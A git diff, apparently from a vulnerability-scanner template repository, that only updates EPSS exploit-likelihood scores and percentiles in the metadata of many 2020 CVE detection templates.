a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index 3211fee1c4..750f57b5a4 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-24312 cwe-id: CWE-552 - epss-score: 0.01916 - epss-percentile: 0.87249 + epss-score: 0.02041 + epss-percentile: 0.87751 cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index ab61740132..1092016a46 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-24391 - epss-score: 0.40297 - epss-percentile: 0.96916 + epss-score: 0.47737 + epss-percentile: 0.97156 cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml index 2d593b0262..9b85541a38 100644 --- a/http/cves/2020/CVE-2020-24550.yaml +++ b/http/cves/2020/CVE-2020-24550.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24550 cwe-id: CWE-601 - epss-score: 0.00135 - epss-percentile: 0.4844 + epss-score: 0.00144 + epss-percentile: 0.50112 cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24571.yaml b/http/cves/2020/CVE-2020-24571.yaml index 321bc9783e..20a88d56bf 100644 --- a/http/cves/2020/CVE-2020-24571.yaml +++ b/http/cves/2020/CVE-2020-24571.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-24571 cwe-id: CWE-22 epss-score: 0.04939 - epss-percentile: 0.9195 + epss-percentile: 0.92017 cpe: cpe:2.3:a:nexusdb:nexusdb:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 05fc9e3256..7ad791084d 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-24579 cwe-id: CWE-287 epss-score: 0.04563 - epss-percentile: 0.91612 + epss-percentile: 0.91666 cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index bf41ae66fe..c3d7ad90af 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-24589 cwe-id: CWE-611 epss-score: 0.65025 - epss-percentile: 0.97575 + epss-percentile: 0.97603 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24701.yaml b/http/cves/2020/CVE-2020-24701.yaml index 6a46570590..1a4543ff59 100644 --- a/http/cves/2020/CVE-2020-24701.yaml +++ b/http/cves/2020/CVE-2020-24701.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-24701 cwe-id: CWE-79 epss-score: 0.00818 - epss-percentile: 0.79863 + epss-percentile: 0.79947 cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index fda7312efd..7871a02241 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24902 cwe-id: CWE-79 - epss-score: 0.00191 - epss-percentile: 0.56464 + epss-score: 0.00195 + epss-percentile: 0.57403 cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index 79f7683f4e..d88d3568a9 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24903 cwe-id: CWE-79 - epss-score: 0.00262 - epss-percentile: 0.63718 + epss-score: 0.00269 + epss-percentile: 0.64313 cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index 9d17bf40a5..1cb966bc33 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-24912 cwe-id: CWE-79 epss-score: 0.0018 - epss-percentile: 0.5505 + epss-percentile: 0.55216 cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-24949.yaml b/http/cves/2020/CVE-2020-24949.yaml index e47a8817d5..548c723faf 100644 --- a/http/cves/2020/CVE-2020-24949.yaml +++ b/http/cves/2020/CVE-2020-24949.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-24949 cwe-id: CWE-77 epss-score: 0.96298 - epss-percentile: 0.99413 + epss-percentile: 0.99429 cpe: cpe:2.3:a:php-fusion:php-fusion:9.03.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml index eb04eaded2..c60e824f81 100644 --- a/http/cves/2020/CVE-2020-25078.yaml +++ b/http/cves/2020/CVE-2020-25078.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-25078 - epss-score: 0.78949 - epss-percentile: 0.97964 + epss-score: 0.80702 + epss-percentile: 0.98041 cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index ef8a71c607..b27c2e3a96 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-25213 cwe-id: CWE-434 - epss-score: 0.97336 - epss-percentile: 0.99864 + epss-score: 0.97381 + epss-percentile: 0.99898 cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index c509814caf..1e5d5a104c 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-25223 cwe-id: CWE-78 - epss-score: 0.97449 - epss-percentile: 0.99947 + epss-score: 0.97495 + epss-percentile: 0.99976 cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index 4b178352c7..f05134051a 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-25495 cwe-id: CWE-79 epss-score: 0.00176 - epss-percentile: 0.54601 + epss-percentile: 0.54751 cpe: cpe:2.3:a:xinuos:openserver:5.0.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml index d86d6467ca..09bae9f375 100644 --- a/http/cves/2020/CVE-2020-25506.yaml +++ b/http/cves/2020/CVE-2020-25506.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-25506 cwe-id: CWE-78 - epss-score: 0.97424 - epss-percentile: 0.99925 + epss-score: 0.9743 + epss-percentile: 0.99933 cpe: cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index 0345b53a4d..1809f679e7 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2551 - epss-score: 0.97503 - epss-percentile: 0.99977 + epss-score: 0.97491 + epss-percentile: 0.99973 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index e74179974f..9ecce2e23f 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25540 cwe-id: CWE-22 - epss-score: 0.96308 - epss-percentile: 0.99416 + epss-score: 0.96345 + epss-percentile: 0.99445 cpe: cpe:2.3:a:thinkadmin:thinkadmin:6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index d8632c4855..25fe17ce0a 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25780 cwe-id: CWE-22 - epss-score: 0.01865 - epss-percentile: 0.87018 + epss-score: 0.01621 + epss-percentile: 0.86106 cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index e2d78730c1..9895ac522b 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-25864 cwe-id: CWE-79 - epss-score: 0.00305 - epss-percentile: 0.66357 + epss-score: 0.00324 + epss-percentile: 0.67627 cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index c8bfac028f..def9d920a4 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-26153 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47003 + epss-percentile: 0.47114 cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml index 67cd25d22c..10bba8e672 100644 --- a/http/cves/2020/CVE-2020-26214.yaml +++ b/http/cves/2020/CVE-2020-26214.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-26214 cwe-id: CWE-287 epss-score: 0.01546 - epss-percentile: 0.85678 + epss-percentile: 0.85739 cpe: cpe:2.3:a:alerta_project:alerta:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml index 74e8b94a62..d19b8828b9 100644 --- a/http/cves/2020/CVE-2020-26217.yaml +++ b/http/cves/2020/CVE-2020-26217.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-26217 cwe-id: CWE-78 epss-score: 0.97384 - epss-percentile: 0.99896 + epss-percentile: 0.999 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml index 7963860e49..f8e04f667b 100644 --- a/http/cves/2020/CVE-2020-26248.yaml +++ b/http/cves/2020/CVE-2020-26248.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-26248 cwe-id: CWE-89 epss-score: 0.01617 - epss-percentile: 0.86058 + epss-percentile: 0.86085 cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml index 5cee145e28..7b561b0304 100644 --- a/http/cves/2020/CVE-2020-26258.yaml +++ b/http/cves/2020/CVE-2020-26258.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.7 cve-id: CVE-2020-26258 cwe-id: CWE-918 - epss-score: 0.85457 - epss-percentile: 0.98234 + epss-score: 0.88051 + epss-percentile: 0.98412 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml index f8fce4ad5c..dc8c7d2599 100644 --- a/http/cves/2020/CVE-2020-26413.yaml +++ b/http/cves/2020/CVE-2020-26413.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-26413 cwe-id: CWE-200 - epss-score: 0.65771 - epss-percentile: 0.97596 + epss-score: 0.74714 + epss-percentile: 0.9787 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26876.yaml b/http/cves/2020/CVE-2020-26876.yaml index a505e29379..f474fa0d7f 100644 --- a/http/cves/2020/CVE-2020-26876.yaml +++ b/http/cves/2020/CVE-2020-26876.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-26876 cwe-id: CWE-306 epss-score: 0.01988 - epss-percentile: 0.87519 + epss-percentile: 0.8756 cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26919.yaml b/http/cves/2020/CVE-2020-26919.yaml index 6139c0e9aa..6fa8a7c3e5 100644 --- a/http/cves/2020/CVE-2020-26919.yaml +++ b/http/cves/2020/CVE-2020-26919.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-26919 - epss-score: 0.97402 - epss-percentile: 0.99908 + epss-score: 0.97346 + epss-percentile: 0.99878 cpe: cpe:2.3:o:netgear:jgs516pe_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml index ff555fe689..23f8956b0a 100644 --- a/http/cves/2020/CVE-2020-26948.yaml +++ b/http/cves/2020/CVE-2020-26948.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-26948 cwe-id: CWE-918 epss-score: 0.13986 - epss-percentile: 0.95122 + epss-percentile: 0.95144 cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml index dc9e9ef52c..f770e2792c 100644 --- a/http/cves/2020/CVE-2020-27191.yaml +++ b/http/cves/2020/CVE-2020-27191.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-27191 cwe-id: CWE-22 epss-score: 0.00787 - epss-percentile: 0.79421 + epss-percentile: 0.79503 cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml index 254e368b75..f71eb0fd41 100644 --- a/http/cves/2020/CVE-2020-2733.yaml +++ b/http/cves/2020/CVE-2020-2733.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2733 - epss-score: 0.32887 - epss-percentile: 0.96601 + epss-score: 0.29301 + epss-percentile: 0.96461 cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml index 77178bd935..0ebbe9670e 100644 --- a/http/cves/2020/CVE-2020-27361.yaml +++ b/http/cves/2020/CVE-2020-27361.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-27361 cwe-id: CWE-668 epss-score: 0.0314 - epss-percentile: 0.9005 + epss-percentile: 0.90098 cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:4.50.02:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml index 51e76f86c5..fd938f9cdb 100644 --- a/http/cves/2020/CVE-2020-27467.yaml +++ b/http/cves/2020/CVE-2020-27467.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-27467 cwe-id: CWE-22 epss-score: 0.01098 - epss-percentile: 0.82735 + epss-percentile: 0.82825 cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml index 597ea1cebb..50aa297554 100644 --- a/http/cves/2020/CVE-2020-27481.yaml +++ b/http/cves/2020/CVE-2020-27481.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-27481 cwe-id: CWE-89 - epss-score: 0.10572 - epss-percentile: 0.94454 + epss-score: 0.12857 + epss-percentile: 0.94961 cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27735.yaml b/http/cves/2020/CVE-2020-27735.yaml index 6e4052898e..2a2d1d489e 100644 --- a/http/cves/2020/CVE-2020-27735.yaml +++ b/http/cves/2020/CVE-2020-27735.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-27735 cwe-id: CWE-79 - epss-score: 0.00216 - epss-percentile: 0.59411 + epss-score: 0.00228 + epss-percentile: 0.61022 cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index 0d55d0544a..5f530b70e6 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-27866 cwe-id: CWE-288,CWE-287 epss-score: 0.00363 - epss-percentile: 0.69241 + epss-percentile: 0.69394 cpe: cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index 8dd0bc1273..fb1d14dcf5 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-27982 cwe-id: CWE-79 epss-score: 0.00178 - epss-percentile: 0.54829 + epss-percentile: 0.54994 cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index 1617f98813..f1fd46f653 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27986 cwe-id: CWE-306 - epss-score: 0.09974 - epss-percentile: 0.94281 + epss-score: 0.11967 + epss-percentile: 0.94817 cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index dc1a4e51ad..d0543df026 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-28185 - epss-score: 0.00454 - epss-percentile: 0.72394 + epss-score: 0.00465 + epss-percentile: 0.72823 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml index 1507fb28c9..273573578e 100644 --- a/http/cves/2020/CVE-2020-28188.yaml +++ b/http/cves/2020/CVE-2020-28188.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-28188 cwe-id: CWE-78 - epss-score: 0.97284 - epss-percentile: 0.99837 + epss-score: 0.97279 + epss-percentile: 0.99835 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index 3fbb980839..30dbdf7aa5 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-28208 cwe-id: CWE-203 - epss-score: 0.00847 - epss-percentile: 0.80198 + epss-score: 0.01197 + epss-percentile: 0.83641 cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index bee3eb44be..93a8da9aad 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-28351 cwe-id: CWE-79 epss-score: 0.0036 - epss-percentile: 0.69105 + epss-percentile: 0.69254 cpe: cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml index d5fede3cac..56718b7345 100644 --- a/http/cves/2020/CVE-2020-28871.yaml +++ b/http/cves/2020/CVE-2020-28871.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-28871 cwe-id: CWE-434 epss-score: 0.96944 - epss-percentile: 0.99659 + epss-percentile: 0.99667 cpe: cpe:2.3:a:monitorr_project:monitorr:1.7.6m:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 220497d9a8..b2dd2f948c 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-28976 cwe-id: CWE-918 epss-score: 0.00616 - epss-percentile: 0.76373 + epss-percentile: 0.76481 cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index 641b4382b8..62dcc0fa1a 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-29164 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.58262 + epss-percentile: 0.58416 cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 19b139c2b0..64c926fd77 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29227 epss-score: 0.01122 - epss-percentile: 0.82923 + epss-percentile: 0.83022 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index bcbdf2e43a..9c7a6d908d 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29284 cwe-id: CWE-89 - epss-score: 0.04857 - epss-percentile: 0.91899 + epss-score: 0.06718 + epss-percentile: 0.93156 cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index 589a7917d9..aed9594d99 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-29395 cwe-id: CWE-79 epss-score: 0.05489 - epss-percentile: 0.92412 + epss-percentile: 0.92451 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml index abf38eacff..d151b8258d 100644 --- a/http/cves/2020/CVE-2020-29453.yaml +++ b/http/cves/2020/CVE-2020-29453.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2020-29453 cwe-id: CWE-22 - epss-score: 0.01454 - epss-percentile: 0.85193 + epss-score: 0.01696 + epss-percentile: 0.86377 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml index 3ff3dc900c..7bb4b8c6d7 100644 --- a/http/cves/2020/CVE-2020-29583.yaml +++ b/http/cves/2020/CVE-2020-29583.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2020-29583 cwe-id: CWE-522 epss-score: 0.96219 - epss-percentile: 0.99388 + epss-percentile: 0.99405 cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml index c749b954c1..4a48688982 100644 --- a/http/cves/2020/CVE-2020-29597.yaml +++ b/http/cves/2020/CVE-2020-29597.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29597 cwe-id: CWE-434 - epss-score: 0.83778 - epss-percentile: 0.98154 + epss-score: 0.83237 + epss-percentile: 0.98162 cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-3187.yaml b/http/cves/2020/CVE-2020-3187.yaml index d533da72e7..7403dd9082 100644 --- a/http/cves/2020/CVE-2020-3187.yaml +++ b/http/cves/2020/CVE-2020-3187.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.1 cve-id: CVE-2020-3187 cwe-id: CWE-22 - epss-score: 0.97251 - epss-percentile: 0.9981 + epss-score: 0.97259 + epss-percentile: 0.99819 cpe: cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index bb4e6cfb7a..14cc99831b 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -22,9 +22,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-3452 - cwe-id: CWE-22,CWE-20 - epss-score: 0.97529 - epss-percentile: 0.9999 + cwe-id: CWE-20,CWE-22 + epss-score: 0.97531 + epss-percentile: 0.99991 cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index 0cde6078dd..e413e17525 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-35234 cwe-id: CWE-532 epss-score: 0.37453 - epss-percentile: 0.96821 + epss-percentile: 0.9684 cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git 